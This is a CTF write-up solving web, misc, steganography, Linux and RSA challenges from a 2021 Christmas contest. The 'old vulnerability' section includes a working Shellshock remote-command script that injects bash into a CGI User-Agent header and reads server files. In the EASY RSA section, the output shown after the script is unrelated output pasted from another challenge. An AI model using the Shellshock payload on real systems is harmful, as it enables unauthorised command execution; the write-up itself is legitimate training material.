This CTF is one of the CTF's that I had fun playing , it was having multiple categories and was in Jeopardy Style .
### WEB
---
##### Mr RoboT
This was the first challenge with the description `Hello Mr Robot` I directly knew that they want us to check the robots.txt file!
And we have the flag , that was a quick one:) and a fun one!
FLAG : `UDOM{d0nt_forg3t_Me_mr_ROBOT}`
##### pPOSTMANm
The next was was named pPOSTMANm , with a description saying `celebrate xmas with postman`, so what I do now is copy the link to access the challenge and try see what I get from visiting it:
Nothing at all , I now try to send a POST request to the same link and see what I get:
Yep the FLAG
FLAG : `UDOM{xmas_with_POSTMAN}`
##### Language
With a description saying `Speak a native language!!!` this totally scared me to hell lol, what's my native language , So I then understood what they mean , and it had something to do with the header `Accept-Language` I have to change it to my countries locale and i'll get the flag!
I sent a request in Curl with the header `Accept-Language` set with value `sw-TZ`
```bash
┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $curl 'http://193.122.147.103:9001/' \
-H 'Connection: keep-alive' \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'Referer: http://193.122.147.103/' \
-H 'Accept-Language: sw-TZ' \
-H 'Cookie: session=8425aad4-0788-42d2-a409-7d780f9fc191.69oMcvm-l0VaAcHr3KgltFHdhgk' \
-H 'dnt: 1' \
-H 'sec-gpc: 1' \
--compressed \
--insecure
```
FLAG : `UDOM{xmas_c3l3br3t3_in_swahili}`
##### inspectorHTML
Well this one was a classic , the description was `see if you can click me` and I said why not hehehe! let's click this web chall!
Okay I wasn't able to click that red button so what I did now was inspect the element of it and see what it has that makes it un-clickable
alright we have that `disable` attribute let's remove it and we will surely have the flag
FLAG : `UDOM{CL1CK_CL1CK_B00M}`
##### BAD DEVELOPER
With the description saying `can you find the mistake!! and login to get flag` why not? I love finding mistakes and bugs and having to login is the best part LOL, so let's open the web app
And we have a login page , let's try have a look at the source code perhaps we might get something and yes! I did try SQLi didn't work!
Okay we have the password now , let's try login with the password and a different username:
And we get an error that , `cyrange` is the one that uses that password to login to the dashboard so yes that's the mistake it's disclosing information! LOL now let's go get the flag!
FLAG : `UDOM{S0m3_M1STAK3_MAD3_DEVELOP3R}`
##### Black and White
This was a fairly easy one with 500 points , with the description saying `lets Turn thing Different Now !! come on Big Man` , and I knew that they were trynna mock me LOL , coz I am the big man
YESSIRRRRRRRRR!
Aight now let's quit playing hahaha, So I visit the web and i'm like WTH is this.......
a black and white page , well I decide to check the source code
Alright something interesting an image that's linked to the attribute with a base64 encoded data type, so let's open this image on a new tab
I now need some milk, it was that easy and had 500 points
FLAG : `UDOM{svg-thingcolor}`
##### old vulnerability
Given the description
```
threatening billions of machines all over the world. like LOG4J LOL!!
i bet flag will be near the developer Center!!
```
This should be a tricky one, given a hint in robots.txt , so I followed up and used FFUF to grab the filename:
```
┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/old_vuln]
└──╼ $curl http://193.122.147.103:9005/robots.txt
disallowed /xxx-xxx/sh****.sh
disallowed /xxx-xxx/sh****.cgi
```
We already know that it's `cgi-bin`, with the command : `ffuf -w rockyou.txt -u http://193.122.147.103:9005/cgi-bin/FUZZ.sh`
Found it! `shelly.sh && shelly.cgi`
This is well exploitable but with the help of a quick simple script from my buddy **codaholi** I was able to finish the job quick!
```python=
#/usr/bin/python3
#@author : codaholikid
import requests
url = "http://193.122.147.103:9005/cgi-bin/shelly.sh"
while 1:
command = input("$ ")
header = {"User-Agent": "() { :;};echo; /bin/bash -c '%s'"%command}
r = requests.post(url, headers=header)
print(r.text.strip())
```
Now I run the script:
```
└──╼ $python3 shellshock.py
$ find / -name "*.txt"
```
and it gave me a list of files but from it I was able to get the file I need
So now let's read our flag:
```bash
$ cat /var/www/flagxxx.txt
UDOM{shell_shock_oldtime}
```
FLAG : `UDOM{shell_shock_oldtime}`
**I'll skip the ENCODE category because all of them were pretty straight forward and easy so ... i'll jump to MISC**
---
### MISC
##### SpellBack
Starting with this challenge named spellback , we are given a string `}LLEWLLEPS_nac_uoy{MODU` :
```bash
┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $echo "}LLEWLLEPS_nac_uoy{MODU" | rev
UDOM{you_can_SPELLWELL}
```
FLAG : `UDOM{you_can_SPELLWELL}`
##### Joe's Son
This is a fun one , and a challenging one as well, given `57ie9eb182943223bo0b4ej7f17c5e4cb6e` and we have to crack it to get the password and then embed the password in `UDOM{password}` format, I first try to identify the hash and then I realize that the hash is actually corrupted or sort of ...
Well basically it should be MD5 , so what I did I took an md5sum of a random file and then checked the length of it and then compared them
```python
>>> hash_a = "a26d7a28043ee37784df3f961bb10d14"
>>> hash_b = "57ie9eb182943223bo0b4ej7f17c5e4cb6e"
>>> len(a)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'a' is not defined
>>> len(hash_a)
32
>>> len(hash_b)
35
```
okay I now realize I have 3 characters that aren't supposed to be there and basically in a MD5 hash alogirthm we dont have some letters such as `o`,`j`,and `i`, let's remove those and then crack the hash!
So now it identifies the hash as `MD2,4,5` : `57e9eb182943223b0b4e7f17c5e4cb6e` i'll use an online hash cracker [crackstation](https://crackstation.net)
And I got the password
FLAG : `UDOM{MerryChristmas}`
##### qwert
This was a quiet a challenge, given in the description an image which had nothing and a text `GERM?Ekrpat{T3FXRAPE+` , so since it's written qwert I decided to try out keyboard change and then converted the text from a layout of Dvorak to Qwerty
FLAG : `UDOM{Dvorak_K3YBOARD}`
##### ENTENSION
Given a string `H4sICAVIx2EAA2FyZmcAC3Xx9612j/IMiA8ONzYOqeUCALTGXewRAAAA` that we have to get a flag from it , well i'm not speaking gibberish , so I sent the string straight to cyberchef :
FLAG : `UDOM{GZIP_SW33T}`
##### suspect
This challenge only had two solvers me and my bwoi [codaholikid](https://twitter.com/codaholikid)
Well it was a fun one actually , so basically we are given an image
but nothing I got from it , I tried binwalking over it but still nothing so then I decided to take the hash and go check it out on [virustotal](https://www.virustotal.com/gui/home/upload)
```
┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/suspect]
└──╼ $md5sum suspect.png
6985be92576b016da18ea0846818fdc4 suspect.png
```
FLAG : `UDOM{TOTAL_virus}`
---
### STEG
##### Morxe
We have this challenge made by my bwoi [blackninja](https://twitter.com/blackninja233) , we are given a wav file which has some weird tones inside it and the sounds from it tell me that it's Morse Code , So i directly went to an online morse code decoder
FLAG : `WEW1SHM3RRYCHR1SMASSUDOMCYB3RCLUB`
##### stegx
Also had two solvers me again and my bwoi @codaholikid , I solved it by guessing lol, but @codaholikid made a loop , I actually guessed a wordlist , since the description was `Not everything can be found in rock`
and we are given an image , that has something embedded in it with `steghide` , so we have to crack the password with `stegseek`
So we got the password as `x4ivygA51F` and the file is extracted as `output.txt` but original name is `flag.txt`
```bash
┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/stegx/test]
└──╼ $cat output.txt
UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}
```
FLAG : `UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}`
##### bytex
this was quiet a fun one! , given a file which doesn't have any format , and we have to get the flag , the description is `Can you see something inside something?? You see, take me out...`
Alright so i first download the image:
```
┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/bytex/test]
└──╼ $file udom
udom: data
```
So we find a bunch of NO FLAG NO FLAG , let's dig a bit deep
we can see that there is a JFIF header covered overthere so let's use `vim` to remove the NO FLAGs and then use `eog` to view the image
alright we cleaned it! , so let's view it now
FLAG : `UDOM{N0w_Y0u_know_How_bytes_begin_and_end_t0o}`
##### Mr Whit3
This is another challenge only solved with me and buddy @codaholikid, uwiii, stuff is kinda challenging , hahaha so basically , the description says `Can you see in the light?` and we are given a txt file , first thing I do is try and read it but as I do try to read it I came across something , like whitespace , then I realized yes it is whitespace but made with stegsnow, and it also has a password so I have to crack it with a wordlist:
So I wrote a simple script that will help me do the job , excuse my bad coding style :) but as long as it does the jOB then it is elite!
```python=
#!/usr/bin/python3
# author : @tahaafarooq#9056
import os
wordlist = open("merryword.txt", "r")
lines = wordlist.readlines()
count = 0
for line in lines:
count += 1
os.system("stegsnow -C -p '"+line.strip()+"' merryXmasMrWhite.txt")
```
So I made a custom wordlist of mine with all words with `merry` from `rockyou.txt` and then named the wordlist as `merryword.txt`
that worked but the only problem is there are alot of results used from every password in the wordlist , so now i'll grep the result
FLAG : `UDOM{SN0wcracker_wellDON3}`
---
### LINUX
##### Bash_History
The description said `get me!!!`, and then we are given a zip file
```
└──╼ $unzip bash_history.zip
Archive: bash_history.zip
creating: Documents/
creating: LAB/
creating: flag/
extracting: flag.txt
inflating: .bash_history
inflating: .bash_logout
```
we unzip it we get some fils including `.bash_history` which is interesting and we also get `flag.txt`
They tricked us!! , SHISH!, But I found something interesting ..
```bash
└──╼ $echo "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vZWVMM1ZOMUE="| base64 -d
https://pastebin.com/eeL3VN1A
```
I got a pastebin link
From the link I followed the mega link and I downloaded an image , and from the image I was able to get the flag
FLAG : `UDOM{its_called_OSINT}`
### ENCODED :+1:
I'll only write about 3 challenges in this category namely; `EASY RSA`, `MEDIUM RSA`, and `Ben Olmstead`
##### EASY RSA
We are given a file named `rsa.txt` which have information about our `p` and `q` and `n` and of course our ciphertext `c` and exponent ,so now this should be easy:
```
p = 11116188838939060770257745148147358293555735818304945031904314986499619902861389131692960923447811615331917485192156658652749983632634958762152049925477127
q = 8487919438101303814483748529639602760583915398820568411450788370335198224694701358911154306675934195405262897926286524061449821386207216748726261969771421
e = 65537
c = 29084496881534296943051814218289640762156351681357178292873637784699231017881629945435160527516295265495090841005829367668930442743360493983807041342707012552879343826078826331308441763546747670052757146096657340929494256815236122799603923149019274821906527452186538703951939449064959876032924639999735327975
```
because we are given everything and we dont have to find any factor of n or anything we just have to create our N, I wrote a simple python script that will do all the Dual Prime RSA calculation and give us our plain text back:
```python=
#!/usr/bin/python3
# author : @tahaafarooq
import os
from Crypto.Util.number import inverse
ct = int(input("Enter your cipher text : "))
p = int(input("Enter your P value : "))
q = int(input("Enter your Q value : "))
e = int(input("Enter your exponent : "))
n = p*q
phi = (p-1)*(q-1)
d = inverse(e,phi)
m = pow(ct,d,n)
key = hex(m)[2:-1]
pt = os.system("echo "+key.strip()+" | xxd -r -p")
print(pt)
```
Make sure you have `xxd` installed , if you dont have you it you can install it with `sudo apt-get install xxd` in debian and ubuntu system or `pacman -S xxd` in arch based systems
So now let's run our script
┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/bytex/test]
└──╼ $file udom
udom: data
FLAG `UDOM{qu1ck_s1mp3l_rsa_13377}`
##### MEDIUM RSA
This one was a multi prime RSA challenge we were given `rsa.txt` which had the following:
```
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
e = 65537
c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469
```
So I took the `n` and used factordb to get the prime factors of the `n` so as I could the the ps and qs
Okay we have a bunch of ps and qs, had quiet some problem into solving it but came accross a script on github and I edited it abit and I was able to get flag after executing
```python=
#!/usr/bin/python3
# author : @tahaafarooq
import os
#from Crypto.Util.number import inverse
factors = [9282105380008121879, 9303850685953812323, 9389357739583927789, 10336650220878499841, 10638241655447339831, 11282698189561966721, 11328768673634243077, 11403460639036243901, 11473665579512371723, 11492065299277279799, 11530534813954192171, 11665347949879312361, 12132158321859677597, 12834461276877415051, 12955403765595949597, 12973972336777979701, 13099895578757581201, 13572286589428162097, 14100640260554622013, 14178869592193599187, 14278240802299816541, 14523070016044624039, 14963354250199553339, 15364597561881860737, 15669758663523555763, 15824122791679574573, 15998365463074268941, 16656402470578844539, 16898740504023346457, 17138336856793050757, 17174065872156629921, 17281246625998849649]
c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469
e = 65537
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
def egcd(a,b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a,m):
g, x, y = egcd(a,m)
if g != 1:
raise Exception("modular inversion does not exist")
else:
return x % m
ts = []
xs = []
ds = []
for i in range(len(factors)):
ds.append(modinv(e, factors[i]-1))
m = factors[0]
for i in range(1, len(factors)):
ts.append(modinv(m, factors[i]))
m = m * factors[i]
for i in range(len(factors)):
xs.append(pow(c%factors[i], ds[i], factors[i]))
x = xs[0]
m = factors[0]
for i in range(1, len(factors)):
x = x + m * ((xs[i] - x % factors[i]) * (ts[i-1] % factors[i]))
m = m * factors[i]
key = hex(x%n)[2:-1]
print(os.system("echo "+key.strip()+" | xxd -r -p"))
```
```
└──╼ $python3 mprsa_dec.py
UDOM{Y0U_GO0T_1T_MANY_PRIM3S_133770
```
FLAG : `UDOM{Y0U_GO0T_1T_MANY_PRIM3S_13377}`
##### Ben Olmstead
It has a description saying `You cant win!!` but I guess I just knew what I was doing LOL, alright so we are given a file named `weirdBase.txt`
Alright I was scared , I was like "WHAT IS THE NAME OF HELL IS THIS????" but then I googled the name of the challenge and I came accross something similar:
It's a programming language that I didn't know it existed until I read about it now what to do with the weird string..., I took the string to dcode.fr and then it gave me a ping back that it's ASCII85
And from there I decoded the string and I got this:
this was another weird string and now my mind is curropting I'm like hold up what have I just done LOL, but i remembered about Malbolge programming language and I google a compiler for it and I was able to get an online compiler and run it
And I have the flag finally!!
FLAG : `UDOM{malbolge_encoder}`
---
I actually solved all challenges with ma buddy [codaholikid](https://twitter.com/codaholikid), and got #1st with my buddy codaholi leading #2nd
Congrats to **Nicholaus** , **Munojr**, **szdiof**, and **mrAlienx**
```
26 | 12 | 2021 | @tahaafarooq(twitter)
```
Sign in with Wallet
Connect another wallet